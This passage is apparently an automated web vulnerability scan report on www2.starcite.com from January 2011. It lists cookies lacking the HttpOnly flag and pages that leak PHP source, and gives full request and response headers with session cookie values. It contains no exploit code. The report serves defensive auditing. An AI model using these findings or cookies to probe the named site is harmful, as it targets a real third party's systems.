Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Fri, 24 Oct 2008 18:59:00 GMT
ETag: "1000000002c37-4479-45a045fc5a500"
Accept-Ranges: bytes
Content-Length: 17529
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

/* Stylesheet classes for starcite based on STA_styleguide_v1.pdf */
*
{
   font-family:Arial, Helvetica, sans-serif;
   font-size:12px;
}
body{
   margin:0px;
   padding:0px;
   text-align:center;
}
...[SNIP]...

2.158. http://www2.starcite.com/starcite/themes/garland/views-list-Newsview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-Newsview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-Newsview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Wed, 05 Nov 2008 12:06:02 GMT
ETag: "1000000002c4f-457-45af0010831bc"
Accept-Ranges: bytes
Content-Length: 1111
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Tue, 07/29/2008 - 12:50
* View: Newsview
*
* The class sel
...[SNIP]...

2.159. http://www2.starcite.com/starcite/themes/garland/views-list-customersuccessview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-customersuccessview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-customersuccessview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2008 17:31:00 GMT
ETag: "1000000002c3d-7fe-4546ede539d00"
Accept-Ranges: bytes
Content-Length: 2046
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Wed, 07/30/2008 - 04:31
* View: customersuccessview
*
* Th
...[SNIP]...

2.160. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerseventview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-plannerseventview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.161. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerswhitepaperview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-plannerswhitepaperview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.162. http://www2.starcite.com/starcite/themes/garland/views-list-webinarview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-webinarview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-webinarview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002c5c-45e-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 1118
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Wed, 07/30/2008 - 04:42
* View: webinarview
*
* The class
...[SNIP]...

2.163. http://www2.starcite.com/starcite/themes/garland/views-list-whatwedocustomersuccessview.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-whatwedocustomersuccessview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-whatwedocustomersuccessview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
Last-Modified: Fri, 03 Oct 2008 19:55:00 GMT
ETag: "1000000002c5e-312-4585eb5604d00"
Accept-Ranges: bytes
Content-Length: 786
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:00 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Fri, 10/03/2008 - 03:20
* View: whatwedocustomersuccessview

...[SNIP]...

2.164. http://www2.starcite.com/starcite/whatwedo/ourtechnology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/ourtechnology

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/whatwedo/ourtechnology HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:50 GMT;path=/
Content-Length: 23419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.165. http://www2.starcite.com/starcite/whatwedo/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/whatwedo/overview HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:21:56 GMT;path=/
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.166. http://www2.starcite.com/starcite/whatwedo/starcitenetwork  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/starcitenetwork

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/whatwedo/starcitenetwork HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:51 GMT;path=/
Content-Length: 21350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

3. Source code disclosure  previous  next
There are 12 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


3.1. http://www2.starcite.com/starcite/destinationsolutions/finddestinations  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.2. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:25:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:58 GMT;path=/
Content-Length: 18313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
</h3>


<?php//node 335 copied here by sharma ?>

   
<table>
...[SNIP]...
</table>


<?php//node 335 copied --ends here?>


</td>
...[SNIP]...
<td class="rightsection">
               
               <?php// print $sidebar_right;?>
               

               <div id="sidebar-right" class="sidebar">
...[SNIP]...

3.3. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:35:22 GMT;path=/
Content-Length: 17925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
</h3>


<?php//node 335 copied here by sharma ?>

   
<table>
...[SNIP]...
</table>


<?php//node 335 copied --ends here?>


</td>
...[SNIP]...
<td class="rightsection">
               
               <?php// print $sidebar_right;?>
               

               <div id="sidebar-right" class="sidebar">
...[SNIP]...

3.4. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:08 GMT;path=/
Content-Length: 19158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
</h3>


<?php//node 335 copied here by sharma ?>

   
<table>
...[SNIP]...
</table>


<?php//node 335 copied --ends here?>


</td>
...[SNIP]...
<td class="rightsection">
               
               <?php// print $sidebar_right;?>
               

               <div id="sidebar-right" class="sidebar">
...[SNIP]...

3.5. http://www2.starcite.com/starcite/planners/findtherightsolution  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/planners/findtherightsolution

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/planners/findtherightsolution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:55 GMT;path=/
Content-Length: 29497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="Desc
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
